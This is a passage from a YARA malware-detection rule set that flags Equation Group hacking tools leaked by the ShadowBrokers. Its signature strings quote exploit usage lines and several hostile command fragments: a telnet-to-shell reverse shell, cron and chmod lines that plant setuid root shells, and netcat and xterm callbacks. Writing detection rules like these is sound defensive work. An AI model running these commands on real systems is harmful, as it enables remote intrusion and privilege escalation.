    description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
  strings:
    $s1 = "-c COMMAND: shell command string" ascii fullword
    $s2 = "Cannot combine shell command mode with args to do socket reuse" ascii fullword
    $s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 1 of them)
}

rule EquationGroup_electricslide {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
  strings:
    $x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" ascii fullword
    $x2 = "Recieved Unknown Command Payload: 0x%x" ascii fullword
    $x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" ascii fullword
    $x4 = "-------- Delete Key - Remove a *closed* tab" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 2048000 and 1 of them)
}

rule EquationGroup_libXmexploit2 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
  strings:
    $s1 = "Usage: ./exp command display_to_return_to" ascii fullword
    $s2 = "sizeof shellcode = %d" ascii fullword
    $s3 = "Execve failed!" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and 1 of them)
}

rule EquationGroup_wrap_telnet {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
  strings:
    $s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" ascii fullword
    $s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" ascii fullword
    $s3 = "echo \"Call back port2 = ${SPORT}\"" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 4096 and 1 of them)
}

rule EquationGroup_elgingamble {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
  strings:
    $x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" ascii fullword
    $x2 = "[-] kernel not vulnerable" ascii fullword
    $x3 = "[-] failed to spawn shell: %s" ascii fullword
    $x4 = "-s shell           Use shell instead of %s" ascii fullword
  condition:
    1 of them
}

rule EquationGroup_cmsd {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
  strings:
    $x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" ascii fullword
    $x2 = "error: not vulnerable" ascii fullword
    $s1 = "port=%d connected! " ascii fullword
    $s2 = "xxx.XXXXXX" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 1 of ($x*)) or (2 of them)
}

rule EquationGroup_ebbshave {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
  strings:
    $s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" ascii fullword
    $s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" ascii fullword
    $s3 = "version 1 - Start with option #18 first, if it fails then try this option" ascii fullword
    $s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 20480 and 1 of them) or (2 of them)
}

rule EquationGroup_eggbasket {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
  strings:
    $x1 = "# Building Shellcode into exploit." ascii fullword
    $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" ascii fullword
    $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 92160 and 1 of them) or (2 of them)
}

rule EquationGroup_jparsescan {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
  strings:
    $s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" ascii fullword
    $s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" ascii fullword
  condition:
    (filesize < 40960 and 1 of them)
}

rule EquationGroup_sambal {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
  strings:
    $s1 = "+ Bruteforce mode." ascii fullword
    $s3 = "+ Host is not running samba!" ascii fullword
    $s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" ascii fullword
    $s5 = "+ Exploit failed, try -b to bruteforce." ascii fullword
    $s7 = "Usage: %s [-bBcCdfprsStv] [host]" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 92160 and 1 of them) or (2 of them)
}

rule EquationGroup_pclean_v2_1_1_2 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
  strings:
    $s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" ascii fullword
    $s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and all of them)
}

rule EquationGroup_envisioncollision {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
  strings:
    $x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" ascii fullword
    $x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" ascii fullword
    $s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" ascii fullword
    $s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 20480 and 1 of ($x*)) or (2 of them)
}

rule EquationGroup_cmsex {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
  strings:
    $x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " ascii fullword
    $x2 = "-i target ip address / hostname " ascii fullword
    $x3 = "Note: Choosing the correct target type is a bit of guesswork." ascii fullword
    $x4 = "Solaris rpc.cmsd remote root exploit" ascii fullword
    $x5 = "If one choice fails, you may want to try another." ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and 1 of ($x*)) or (2 of them)
}

rule EquationGroup_exze {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
  strings:
    $s1 = "shellFile" ascii fullword
    $s2 = "completed.1" ascii fullword
    $s3 = "zeke_remove" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 81920 and all of them)
}

rule EquationGroup_porkserver {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file porkserver"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a"
  strings:
    $s1 = "%s/%s server failing (looping), service terminated" ascii fullword
    $s2 = "getpwnam: %s: No such user" ascii fullword
    $s3 = "execv %s: %m" ascii fullword
    $s4 = "%s/%s: unknown service" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 71680 and 3 of them)
}

rule EquationGroup_DUL {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
  strings:
    $x1 = "?Usage: %s <shellcode> <output_file>" ascii fullword
    $x2 = "Here is the decoder+(encoded-decoder)+payload" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 81920 and 1 of them) or (all of them)
}

rule EquationGroup_slugger2 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
  strings:
    $x1 = "usage: %s hostip port cmd [printer_name]" ascii fullword
    $x2 = "command must be less than 61 chars" ascii fullword
    $s1 = "__rw_read_waiting" ascii fullword
    $s2 = "completed.1" ascii fullword
    $s3 = "__mutexkind" ascii fullword
    $s4 = "__rw_pshared" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and (4 of them and 1 of ($x*))) or (all of them)
}

rule EquationGroup_ebbisland {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
  strings:
    $x1 = "Usage: %s [-V] -t <target_ip> -p port" ascii fullword
    $x2 = "error - shellcode not as expected - unable to fix up" ascii fullword
    $x3 = "WARNING - core wipe mode - this will leave a core file on target" ascii fullword
    $x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" ascii fullword
    $x5 = "-A <jumpAddr> (shellcode address)" ascii fullword
    $x6 = "*** Insane undocumented incremental port mode!!! ***" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_jackpop {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
  strings:
    $x1 = "%x:%d  --> %x:%d %d bytes" ascii fullword
    $s1 = "client: can't bind to local address, are you root?" ascii fullword
    $s2 = "Unable to register port" ascii fullword
    $s3 = "Could not resolve destination" ascii fullword
    $s4 = "raw troubles" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 3 of them) or (all of them)
}

rule EquationGroup_parsescan {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
  strings:
    $s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" ascii fullword
    $s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_jscan {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
  strings:
    $s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" ascii fullword
    $s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_promptkill {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
  strings:
    $x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" ascii fullword
    $x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_epoxyresin_v1_0_0 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
  strings:
    $x1 = "[-] kernel not vulnerable" ascii fullword
    $s1 = ".tmp.%d.XXXXXX" ascii fullword
    $s2 = "[-] couldn't create temp file" ascii fullword
    $s3 = "/boot/System.map-%s" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and $x1) or (all of them)
}

rule EquationGroup_estopmoonlit {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
  strings:
    $x1 = "[+] shellcode prepared, re-executing" ascii fullword
    $x2 = "[-] kernel not vulnerable: prctl" ascii fullword
    $x3 = "[-] shell failed" ascii fullword
    $x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_envoytomato {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
  strings:
    $s1 = "[-] kernel not vulnerable" ascii fullword
    $s2 = "[-] failed to spawn shell" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_smash {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
  strings:
    $x1 = "T=<target IP> [O=<port>] Y=<target type>" ascii fullword
    $x2 = "no command given!! bailing..." ascii fullword
    $x3 = "no port. assuming 22..." ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_ratload {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
  strings:
    $x1 = "/tmp/ratload.tmp.sh" ascii fullword
    $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" ascii fullword
    $s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_ys {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
  strings:
    $x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" ascii fullword
    $x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" ascii fullword
    $x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup_ewok {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
  strings:
    $x1 = "Example: ewok -t target public" ascii fullword
    $x2 = "Usage:  cleaner host community fake_prog" ascii fullword
    $x3 = "-g  - Subset of -m that Green Spirit hits " ascii fullword
    $x4 = "--- ewok version" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 81920 and 1 of them)
}

rule EquationGroup_xspy {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
  strings:
    $s1 = "USAGE: xspy -display <display> -delay <usecs> -up" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 61440 and all of them)
}

rule EquationGroup_estesfox {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
  strings:
    $x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" ascii fullword
  condition:
    all of them
}

rule EquationGroup_elatedmonkey_1_0_1_1 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
  strings:
    $x3 = "Usage: $0 ( -s IP PORT | CMD )" ascii fullword
    $s5 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" ascii fullword
    $s13 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" ascii fullword
    $s15 = "cat > /dev/tcp/127.0.0.1/80 <<END" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 5120 and (1 of ($x*) and 5 of ($s*))) or (all of them)
}

rule EquationGroup_scanner {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
  strings:
    $x1 = "program version netid     address             service         owner" ascii fullword
    $x4 = "*** Sorry about the raw output, I'll leave it for now" ascii fullword
    $x5 = "-scan winn %s one" ascii fullword
  condition:
    filesize < 256000 and 1 of them
}

rule EquationGroup__ftshell_ftshell_v3_10_3_0 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
    hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
  strings:
    $s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" ascii fullword
    $s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
    $s3 = "system rm -f /current/tmp/ftshell.latest" ascii fullword
    $s4 = "# ftshell -- File Transfer Shell" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 102400 and 1 of them) or (2 of them)
}

rule EquationGroup__scanner_scanner_v2_1_2 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
    hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
  strings:
    $s1 = "Welcome to the network scanning tool" ascii fullword
    $s2 = "Scanning port %d" ascii fullword
    $s3 = "/current/down/cmdout/scans" ascii fullword
    $s4 = "Scan for SSH version" ascii fullword
    $s5 = "program vers proto   port  service" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 102400 and 2 of them) or (all of them)
}

rule EquationGroup__ghost_sparc_ghost_x86_3 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
    hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
  strings:
    $x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" ascii fullword
    $x2 = "Sending shellcode as part of an open command..." ascii fullword
    $x3 = "cmdshellcode" ascii fullword
    $x4 = "You will not be able to run the shellcode. Exiting..." ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 71680 and 1 of them) or (2 of them)
}

rule EquationGroup__pclean_v2_1_1_pclean_v2_1_1_4 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
    hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
  strings:
    $s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " ascii fullword
    $s2 = "e.g.: -n 1-1024,1080,6666,31337 " ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and all of them)
}

rule EquationGroup__jparsescan_parsescan_5 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
    hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
  strings:
    $s1 = "# default is to dump out all scanned hosts found" ascii fullword
    $s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" ascii fullword
    $s3 = "sadmind is available on two ports, this also works)" ascii fullword
    $s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 40960 and 1 of them) or (2 of them)
}

rule EquationGroup__funnelout_v4_1_0_1 {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33"
  strings:
    $s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" ascii fullword
    $s2 = "if ($code =~ /proxyhost/) {" ascii fullword
    $s3 = "\\$rk[1] = \\$rk[1] - 1;" ascii fullword
    $s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 102400 and 2 of them) or (all of them)
}

rule EquationGroup__magicjack_v1_1_0_0_client {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
  strings:
    $s1 = "temp = ((left >> 1) ^ right) & 0x55555555" ascii fullword
    $s2 = "right ^= (temp <<  16) & 0xffffffff" ascii fullword
    $s3 = "tempresult = \"\"" ascii fullword
    $s4 = "num = self.bytes2long(data)" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 81920 and 3 of them) or (all of them)
}

rule EquationGroup__ftshell {
  meta:
    description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-08"
    super_rule = 1
    hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
    hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
  strings:
    $s1 = "if { [string length $uRemoteUploadCommand]" ascii fullword
    $s2 = "processUpload" ascii fullword
    $s3 = "global dothisreallyquiet" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 102400 and 2 of them) or (all of them)
}

rule EquationGroup_store_linux_i386_v_3_3_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc"
  strings:
    $s1 = "[-] Failed to map file: %s" ascii fullword
    $s2 = "[-] can not NULL terminate input data" ascii fullword
    $s3 = "[!] Name has size of 0!" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 61440 and all of them)
}

rule EquationGroup_morerats_client_genkey {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89"
  strings:
    $x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" ascii fullword
    $x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" ascii fullword
  condition:
    (filesize < 3072 and all of them)
}

rule EquationGroup_cursetingle_2_0_1_2_mswin32_v_2_0_1 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
